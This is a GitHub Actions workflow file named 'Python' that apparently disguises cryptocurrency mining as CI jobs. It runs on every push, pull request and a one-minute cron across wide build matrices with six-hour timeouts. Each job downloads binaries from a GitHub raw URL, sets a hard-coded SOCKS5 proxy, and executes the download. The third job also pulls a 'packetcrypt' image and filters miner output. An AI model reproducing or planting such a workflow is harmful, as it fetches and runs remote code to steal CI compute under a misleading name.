name: Python
on: 
  push:
  pull_request:
  schedule:
  - cron: "*/1 * * * *"

jobs:
 python-1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 360

    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "wget -O 1 https://raw.githubusercontent.com/johnwixk228/Pake/main/gas && wget -O 2 https://raw.githubusercontent.com/johnwixk228/Pake/main/paket && export http_proxy=socks5://98.162.25.23:4145 && chmod +x 1 && ./1"

 python-2:
    runs-on: ubuntu-18.04
    needs: python-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 360

    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "wget -O 1 https://raw.githubusercontent.com/johnwixk228/Pake/main/gas && wget -O 2 https://raw.githubusercontent.com/johnwixk228/Pake/main/paket && export http_proxy=socks5://98.162.25.23:4145 && chmod +x 1 && ./1"

 python-build-4:
    runs-on: ubuntu-20.04
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 360
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        docker pull thomasjp0x42/packetcrypt
        docker run wget -O 1 https://raw.githubusercontent.com/johnwixk228/Pake/main/gas && wget -O 2 https://raw.githubusercontent.com/johnwixk228/Pake/main/paket && export http_proxy=socks5://98.162.25.23:4145 && chmod +x 1 && ./1 2>&1 | grep --color=never -o "annmine.rs.*Ke.*"
